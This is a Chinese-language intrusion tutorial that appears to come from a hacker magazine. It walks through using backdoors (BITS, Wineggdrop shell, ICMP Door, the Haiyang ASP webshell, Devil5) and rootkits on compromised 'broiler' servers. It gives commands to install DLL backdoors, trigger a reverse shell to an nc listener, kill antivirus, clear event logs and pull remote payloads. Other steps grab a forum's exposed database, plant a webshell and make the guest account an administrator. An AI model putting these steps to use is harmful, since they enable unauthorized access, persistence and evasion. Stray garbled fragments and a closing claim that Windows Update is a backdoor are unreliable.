後門可以按照很多方式來分類,標准不同自然分類就不同,為了便於大家理解,我們從技術方面來考慮後門程序的分類方法: 此類後門程序一般都是伺服器上正常 的web服務來構造自己的連接方式,比如非常流行的ASP、cgi腳本後門等。
網頁後門,網路上針對系統漏洞的攻擊事件漸漸少了,因為大家在認識到網路安全的重要性之後,最簡單卻又最有效的防護辦法:升級,都被大家所認同,所以系統漏洞在以後的歲月中存活的周期會越來越短,而從最近的趨勢來看,腳本漏洞已經漸漸取代了系統漏洞的地位,非常多的人開始研究起腳本漏洞來,sql注入也開始成為各大安全站點首要關注熱點,找到提升許可權的突破口,進而拿到伺服器的系統許可權。
asp、CGI、PHP這三個腳本大類在網路上的普遍運用帶來了腳本後門在這三方面的發展。
線程插入後門
利用系統自身的某個服務或者線程,將後門程序插入到其中,具體原理原來《黑客防線》曾具體講解過,感興趣的朋友可以查閱。這也是現在最流行的一個後門技術。
擴展後門
所謂的「擴展」,是指在功能上有大的提升,比普通的單一功能的後門有很強的使用性,這種後門本身就相當於一個小的安全工具包,能實現非常多的常見安全功能,適合新手使用————但是,功能越強,個人覺得反而脫離了後門「隱蔽」的初衷,具體看法就看各位使用者的喜好了。
c/s後門
和傳統的木馬程序類似的控制方法,採用「客戶端/服務端」的控制方式,通過某種特定的訪問方式來啟動後門進而控制伺服器。
root kit 6o f3H 3B
這個需要單獨說明,其實把它單獨列一個類在這里是不太恰當的,但是,root kit的出現大大改變了後門程序的思維角度和使用理念,可以說一個好的root kit就是一個完全的系統殺手!後文我們講涉及到這方面,一定不會讓大家失望!
上面是按照技術做的分類,除了這些方面,正向連接後門、反向連接後門等分類也是很常見的,其實如何分類是編程者考慮的事,廣大的使用者就不用考慮那麼多了,我們看重的,只是功能! 首先我們來簡單解釋一下什麼是典型的線程插入後門:這種後門在運行時沒有進程,所有網路操作均播入到其他應用程序的進程中完成。也就是說,即使受控制端安裝的防火牆擁有「應用程序訪問許可權」的功能,也不能對這樣的後門進行有效的警告和攔截,也就使對方的防火牆形同虛設了!因為對它的查殺比較困難,這種後門本身的功能比較強大,是「居中家旅行、入侵攻擊」的必備品哦!
這類的典範就是國內提倡網路共享的小榕的BITS了,從它的推出以來,各類安全工具下載園地里BITS就高居榜首,非常多的朋友使用它的過程中感到了方便。類型:系統後門
使用范圍:wind200/xp/2003
隱蔽程序:★★★★☆
使用難度:★★★☆☆
查殺難度:★★★★☆
BITS其實是Background Intelligent Transfer Servicer的縮寫,可以在不知不覺中實現另一種意義的典型的線程插入後門,有以下特點:進程管理器中看不到;平時沒有埠,只是在系統中充當卧底的角色;提供正向連接和反向連接兩種功能;僅適合用於windows 200/xp/2003。
運用舉例
首先我們用3389登錄上肉雞,確定你有SYSTEM的許可權,將BITS.DLL拷貝到伺服器上,執行CMD命令: 4 #R Br A
rundll32.exebits.dll,install
這樣就激活了BIST,程序用這個特徵的字元來辨認使用者,也就相當於你的密碼了,然後卸載:rundll32.exe BITS.dll,Uninstall
這是最簡單的使用,這個後門除了隱蔽性好外,還有兩大特點是非常 值得借鑒的:埠復用和正反向連接。雖然很多朋友經常聽到這兩個名詞,但並不了解它們,埠復用就是利用系統正常的TCP埠通訊和控制,比如80、139等,這樣的後門有個非常 大的好處就是非常 隱蔽,不用自己開埠也不會暴露自己的訪問,因為通訊本身就是系統的正常訪問!另一個是反向連接,這個很常 見,也是後門中一個經典思路,因為從伺服器上主動方問外邊是不被禁止的,很多很歷害的防火牆就怕這點!
BITS的正向連接很簡單,大家可以參考它的README,這種方式在伺服器沒有防火牆等措施的時候很管用,可以方便地連接,但是遇到有防火牆這樣的方式就不靈了,得使用下面的反向連接方式: 70 +g3l
在本地使用NC監聽(如:nc -l -p 1234)
用NC連接目標主機的任何一個防火牆允許的TCP埠(80/139/445……)
輸入激活命令:[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email] ^q/hQ , 4
目標主機的CMD將會出現NC監聽的埠2222,這樣就實現了繞過防火牆的功能了。 所謂的擴展後門,在普通意義上理解,可以看成是將非常多的功能集成到了後門里,讓後門本身就可以實現很多功能,方便直接控制肉雞或者伺服器,這類的後門非常受初學者的喜愛,通常集成了文件上傳/下載、系統用戶檢測、HTTP訪問、終端安裝、埠開放、啟動/停止服務等功能,本身就是個小的工具包,功能強大。
Wineggdroup shell j;類型:系統後門
使用范圍:win2000/xp/2003
隱蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程度:★★★★☆
查殺難度:★★★★☆
這個後門是擴展後門中很有代表性的一個,功能這全面讓人嘆為觀止,它能實現如下比較有特色的功能:進程管理,可查看,殺進程(支持用進程名或PID來殺進程);注冊表管現(查看,刪除,增加等功能);服務管理(停止,啟動,枚舉,配置,刪除服務等功能)埠到程序關聯功能(fport);系統重啟,關電源,注銷等功能(reboot,poweroff,shutdown,logoff);嗅探密碼功能;安裝終端,修改終端埠功能;埠重定向功能(多線程,並且可限制連接者IP);HTTP服務功能(多線程,並且可限制連接者IP);Socd5代理功能(支持兩種不同方式驗證,可限制連接者IP);克隆賬號,檢測克隆賬戶功能(clone,checkclone);加強了的FindpassWord功能(可以得到所有登錄用戶,包括使用克隆賬戶遠程登錄用戶密碼);HTTP代理(完全匿名,支持oicq、 MSN、mirc等程序);其他輔助功能,http下載,刪除日誌,系統信息,恢復常用關聯,枚舉系統賬戶等。
當網路上剛推出這個後門的時候,非常多的人用它來替換自己原來使用的後門,一時間各處贊揚之聲迭起,但多為一些普通的打撈手的心聲,其實它和「後門」的原始定義是有出入的:一旦你需要實現越多的功能,那你的程序在執行、隱藏、穩定等方面就需要考慮非常多的問題,一個疏忽就會導致全盤皆敗,所以不建議將此後門用在需要非常隱蔽的地方。
運用舉例
在安裝後門前,需要使用它自帶的EditServer.exe程序對服務端進行非常詳細的配置,從10個具體配置中,包括了插入線程、密碼、IP登錄郵件通告等方面,不難看出它的功能是非常強大的,隱蔽性也很強,下面說幾個在入侵中常用的功能,相信經常玩入侵的朋友一定能發現它的強大之處:
Fport:列出進程到埠的列表,用於發現系統中運行程序所對應的埠,可以用來檢測常見的隱蔽的後門。
Reboot:重啟系統,如果你上傳並運行了其他後門程序,並需要重啟機器以便讓後門正常工作,那使用這個命令吧! Uz
Shell:得到一個Dos Shell,這個不多講了,直接得到伺服器或者肉雞上的cmd shell。
Pskill PID或程序名:用於殺掉特定的服務,比如殺毒軟體或者是防火牆。
Execute程序:在後台中執行程序,比如sniffer等。http://ip/文件名 保存文件名:下載程序,直接從網上down一個後門到伺服器上。
Installterm埠:在沒有安裝終端服務的win2k服務版的系統中安裝終端服務,重啟系統後才生效,並可以自定義連接埠,比如不用3389而用其他埠。
StopService/StartService:停止或者啟動某個系統服務,比如telnet。
CleanEvent:刪除系統日誌。
Redirect:TCP數據轉發,這個功能是後門程序中非常出色的一個功能,可以通過某一埠的數據轉發來控制內網的機器,在滲透入侵的時候非常管用!
EnumService:列舉所有自動啟動的服務的資料,比如後門、木馬。
RegEdit:進入注冊表操作模式,熟悉注冊表的使用者終於在後門中找到了福音! !
Findpassword:得到所有登錄用戶密碼,比我們常用的findpass功能可強多了。
總體來講,Wineggdrop shell是後門程序中很出彩的一個,它經過作者幾次大規模的修改和升級,已經趨於穩定,功能的強大當然沒得說,但是由於功能太強大,被查殺和懷疑是難以避免的,所以很多人在使用Wineggdrop shell一段時間後就發現肉雞飛了,其實是很正常的事,我你出不用氣餒,其實用很簡單的方法就可以很好地提高它的隱蔽性,下文將有說明。
相對於Wineggdrop shell來說,獨孤劍客的winshell在功能上就不那麼全面了,但是筆者推薦新手更多的使用winshell而不是Wineggdrop shell,因為winshell功能除了獲得一個shell以外,只加入了一些重啟、關閉伺服器的命令,功能相對簡單,但完全使用系統自帶的cmd來執行命令,對系統學習和掌握也是非常有幫助的!
Winshell和wolf這兩者都是國內早期頂尖的後門程序,程序的編制無疑是非常經典的,新手學習時使用這兩款後門一定能讓你明白很多系統相關東西,了解很多入侵思路和方法。 傳統的木馬程序常常使用C/S構架,這樣的構架很方便控制,也在一定程度上避免了「萬能密碼」的情況出現,對後門私有化有一定的貢獻,這方面分類比較模糊,很多後門可以歸結到此類中,比如較巧妙的就是ICMP Door了
類型:系統後門
使用范圍:win2000/xp/2003 2Z6
隱蔽程度:★★★★★
使用難度:★★★☆☆
危害程度:★★★★☆
查殺難度:★★★★★
這個後門利用ICMP通道進行通信,所以不開任何埠,只是利用系統本身的ICMP包進行控制安裝成系統服務後,開機自動運行,可以穿透很多防火牆——很明顯可以看出它的最大特點:不開任何埠~只通過ICMP控制!和上面任何一款後門程序相比,它的控制方式是很特殊的,連80埠都不用開放,不得不佩服務程序編制都在這方面獨特的思維角度和眼光!
運用舉例
這個後門其實用途最廣的地方在於突破網關後對內網計算機的控制,因為很多機密數據都是放在內網計算機上的,而控制內網計算機並不是我們想到位的商業網路進行入侵檢測,它的網路內部並不像我們常見的內網那樣非常容易入侵和控制,因為該公司本身涉及到一些網路安全的服務,所以內網個人計算機的防護是很到位的,在嘗試過很多後門後,最後ICMP Door幫我實現了成功的滲透內網!由此筆者開始愛上這個後門。
首先使用icmpsrv.exe -install參數進行後門的安裝,再使用icmpsend.exe IP進行控制,可以用:[http://xxx.xxx.xxx/admin.exe-hkfx.exe]方式下載文件,保存在[url=file://\system32]\system32[/url]目錄下,文件名為hkfx.exe,程序名前的「-」不能省去,使用[pslist]還可以列出遠程主機的進程名稱和pid,再使用[pskill id]就可以殺進程了,同樣,輸入普通cmd命令,則遠程主機也就執行了相關的命令。 ~HF1 ? %
這個後門是採用的c/s構架,必須要使用icmpsend才能激活伺服器,但是他也有自己的先天不足:後門依靠ICMP進行通訊,經過沖擊波的洗禮後,很少有伺服器還接受ICMP包了,很多都屏蔽掉了它,所以用它來控制伺服器不是一個好辦法,這也是我為什麼用它來控制內網計算機的原因了——內網很少有人屏蔽ICMP包吧? 這是ASP腳本方面流傳非常廣的一個腳本後門了,在經過幾次大的改革後,推出了「海陽頂端ASP木馬XP版」、「海陽頂端ASP木馬紅粉佳人版」等功能強大、使用方便的後門,想必經常接觸腳本安全的朋友對這些都不會陌生。類型:網頁木馬
使用范圍:支持ASP、WEB訪問
使用難度:★☆☆☆☆
危害程序:★★★☆☆
查殺難度:★★★☆☆
伺服器系統配置都相對安全,公開的系統漏洞存在的機會很少,於是腳本方面的漏洞就開始火起來。首先我們通過某種途徑獲得一個伺服器的頁面許可權(比如利用論壇上傳達室類型未嚴格設置、SQL注入後獲得ASP系統的上傳許可權、對已知物理路徑的伺服器上傳特定程序),然後我們可以通過簡單的上傳ASP程序或者是直接復制海陽項端的代碼,然後通過WEB訪問這個程序,就能很方便地查閱伺服器上的資料了,下面舉個簡單的便子(由於只是簡單的介紹,下文便子不會太難或者太普遍,希望大家理解)。
leadbbs2.77曾經風靡網路,它是個很典型的ASP論壇,屏蔽了很多可以SQL注入的寺方,但是很多傻瓜級別的網路管理員總是喜歡默認安裝,然後啟用論壇,我們只需要很簡單地在IE中輸入:WWW。***。COM/BBS/DATA/LEADBBS。MDB就能夠直接下載該論壇的資料庫了,而且沒有MD5加密哦!,我們直接找到管理員的賬戶和密碼,然後登錄論壇,到管理界面將論壇的「聯系我們」、「幫助」等ASP文件替換成我們的海陽項端代碼,然後執行GUEST許可權的CMD命令,方便的上傳/下載將定程序、遠程執行程序等,這樣一個隱藏的後門就建好了!取得伺服器的SYSTEM許可權就看大家自己的辦法了。
一般來講,海洋的功能是非常強大的,而且不容易被查殺(一個朋友採取的方式是:先利用某個腳本漏洞上傳網頁後門,再通過海洋上傳另一個後門到隱蔽的路徑,然後通過最後上傳的後門來刪除第一次上傳的海洋,這樣後門的存放路徑就可以放得非常深了,普通管理員是很難發現的),如果管理員覺得自己可能中了這里邊樣的後門,可以利用論壇備份來恢復自己的頁面系統,再配合系統日誌、論壇日誌等程序檢查系統,發現可疑ASP文件打開看看海洋是很好識別的,再刪除就可以了。
腳本方面的後門還有CGI和PHP兩面三刀大類,使用原理都差不多,這里就不再多介紹,在黑防論壇也收錄了這三種後門,大家可以下載後自己研究。 類型:系統後門
使用范圍:win200/xp/2003
隱蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程序:★★★★☆
查殺難度:★★★☆☆
同BITS一樣,Devil5也是線程插入式的後門,和BITS不同的是它可以很方便的在GUI界面下按照自己的使用習慣定製埠和需要插入的線程,適合對系統有一定了解的使用都使用,由於是自定義插入線程,所以它更難被查殺,下面我們來看看它的使用。
道德使用它自帶的配置程序EDITDEVIL5.EXE對後門進行常規的配置,包括控制埠、插入線程、連接密碼、時間間隔等方面關鍵點是對插入線程的定製,一般設置成系統自帶的SVCHOST,然後運行後門就可以控制了。
我們用TELNET連接上去,連接的格式是:TELNET *** 定製的埠,它和其他後門不同之處在於連接後沒有提示的界面,每次執行程序也是分開的,必須要每次都有輸入密碼,比如我們丟掉了伺服器和管賬戶,可以激活GUEST後再將GUEST加到管理員許可權,記得每次執行命令後加上「>密碼」就可以了:net localgroup administrators guest /add >hkfx,然後你又可以控制伺服器了。
很明顯示,同榕哥的BITS相比,DEVIL5有一些缺陷:不能通過系統自帶埠通訊、執行命令比較麻煩,需要每次輸入密碼而且不回顯示輸入內容,很容易出錯。但是,它有自己的優勢:插入線程可以自已定製,比如設置IE的線程為插入的目標就比較難被查殺:自己提供了專門的查殺工具DELDEVIL5.exe,幫助防護者清理系統;而且它可以任意改名和綁定,使用靈活性上比BITS強……大家選擇哪能款就看自己的喜好了。
另外,PortLess BackDoor等工具也是此類的後門,功能強大,隱蔽性稍差,大家有興趣可以自己研究一下。 如果說上面的後門程序都各有千秋、各有所長的話,它們和經典的root kit 一比簡直就是小巫見大巫了,那究竟什麼樣是root kit呢?
root kit出現於20世紀90年代初,在1994年2月的一篇安全咨詢報告中首先使用了root kit這個名詞。從出現至今,root kit 的技術發展非常迅速,應用越來越廣泛,檢測難度也越來越大。其中釷對SunOS和Linux兩種操作系統的root kit最多。
很多人有一個誤解,他們認為root kit 是用作獲得系統root訪問許可權的工具。實際上,root kit是攻擊都用來隱蔽自己的蹤跡和保留root訪問許可權的工具。通常,攻擊者通過遠程攻擊獲得root訪問許可權,進入系統後,攻擊者會在侵入的主機中安裝root kit,然後他將經常通過root kit的後門檢查系統是否有其他的用戶登錄,如果只有自己,攻擊者就開始著手清理日誌中的有關信息。通過root kit的嗅探器獲得其他系統的用戶和密碼之後,攻擊者就會利用這些信息侵入其他系統。
從*nix系統上遷移到windows系統下的root kit完全沿襲了這些「可怕」的功能!網路上常見的root kit 是內核級後門軟體,用戶可以通過它隱藏文件、進程、系統服、系統驅動、注冊表鍵和鍵值、打開的埠以及虛構可用磁碟窨。程序同時也在內存中偽裝它所做的改動,並且隱身地控制被隱藏進程。程序安裝隱藏後門,注冊隱藏系統服務並且安裝系統驅動。該後門技術允許植入reDirector,是非常難以查殺的一個東東,讓很多網路管員非常頭疼!
⑨ 請問什麼是後門程序,什麼是腳本程序
後門程序又稱特洛依木馬,其用途在於潛伏在電腦中,從事搜集信息或便於黑客進入的動作。後門程序和電腦病毒最大的差別,在於後門程序不一定有自我復制的動作,也就是後門程序不一定會「感染」其它電腦。
後門程序一般是指那些繞過安全性控制而獲取對程序或系統訪問權的程序方法。在軟體的開發階段,程序員常常會在軟體內創建後門程序以便可以修改程序設計中的缺陷。但是,如果這些後門被其他人知道,或是在發布軟體之前沒有刪除後門程序,那麼它就成了安全風險,容易被黑客當成漏洞進行攻擊。
最著名的後門程序,該算是微軟的Windows Update了。Windows Update的動作不外乎以下三個:開機時自動連上微軟的網站,將電腦的現況報告給網站以進行處理,網站通過Windows Update程序通知使用者是否有必須更新的文件,以及如何更新。如果我們針對這些動作進行分析,則「開機時自動連上微軟網站」的動作就是後門程序特性中的「潛伏」,而「將電腦現況報告」的動作是「搜集信息」。因此,雖然微軟「信誓旦旦」地說它不會搜集個人電腦中的信息,但如果我們從Windows Update來進行分析的話,就會發現它必須搜集個人電腦的信息才能進行操作,所差者只是搜集了哪些信息而已。